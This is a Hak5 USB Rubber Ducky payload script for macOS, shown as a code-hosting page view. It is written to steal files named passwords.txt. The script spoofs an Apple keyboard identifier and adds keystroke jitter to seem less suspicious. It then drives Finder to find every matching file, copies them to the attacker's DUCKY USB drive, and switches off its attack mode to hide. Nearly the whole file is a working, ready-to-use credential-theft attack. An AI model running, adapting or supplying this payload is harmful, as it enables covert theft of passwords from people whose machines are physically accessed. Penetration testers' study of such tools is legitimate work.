Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/Exfiltrate_file_through_GUI_mac/payload.txt
2971 views
1
REM ###################################################

2
REM #                                                 |

3
REM # Title        : Exfiltrate Files through GUI mac |

4
REM # Author       : Kile                             |

5
REM # Version      : 1.0                              |

6
REM # Category     : Exfiltration                     |

7
REM # Target       : MacOS                            |

8
REM #                                                 |

9
REM ###################################################

10


11
REM NOTE This is not unlikely to fail depending on the speed of search or if a large amount of files meet the criteria. Adjust DELAYs to your needs

12


13
ATTACKMODE STORAGE HID VID_05AC PID_021E

14
DELAY 2000

15


16
REM the filename for the payload to look for

17
DEFINE #target passwords.txt

18


19
REM Given that it uses the GUI it is a good idea to enable jitter to be less suspicious

20
$_JITTER_ENABLED = TRUE

21


22
REM This function tabs the amount of times it takes from a finder search to go onto the first file result (4)

23
FUNCTION DO_TABS()

24
    VAR $COUNTER = 0

25
    WHILE ($COUNTER < 4)

26
        TAB

27
        DELAY 100

28
        $COUNTER = ($COUNTER + 1)

29
    END_WHILE

30
END_FUNCTION

31


32
REM Open finder

33
COMMAND SPACE

34
STRINGLN finder

35
DELAY 500

36
REM Command n spawns a new window. This makes sure there is only one finder tab (for tabbing to the files later)

37
COMMAND n 

38


39
REM Open search bar in finder

40
COMMAND f

41
DELAY 200

42
REM type target filename

43
STRING #target

44
DELAY 200

45
REM This specifies that the passwords.txt has to be a filename and not be in any file

46
DOWN

47
ENTER

48
ENTER

49


50
REM Give a bit to find all files

51
DELAY 500

52
REM now 4 tabs to get to the first file result

53
DO_TABS()

54


55
REM select all files that have the specified target in their name

56
COMMAND a

57
REM Copy the files

58
COMMAND c

59
DELAY 500

60
REM Go back to search window

61
COMMAND f

62
DELAY 200

63
REM Delete previous search

64
DEL

65


66
REM Search for DUCKY USB

67
STRING DUCKY

68
DELAY 200

69
DOWN

70
ENTER

71
REM Specifies that the "DUCKY" has to be an external USB drive

72
STRING Volume

73
DELAY 200

74
DOWN

75
DOWN

76
DOWN

77
ENTER

78
ENTER

79
REM This can take annoyingly long to show up which is why the delay is so big

80
DELAY 6000

81


82
REM Go to first result

83
DO_TABS()

84


85
REM Open the drive

86
COMMAND o

87
DELAY 1000

88
REM This takes a few seconds

89


90
REM Paste the copied files. As this may take a few seconds given on how many results there were there is a long delay

91
COMMAND v

92
DELAY 7000

93


94
REM Hide

95
ATTACKMODE OFF

96


97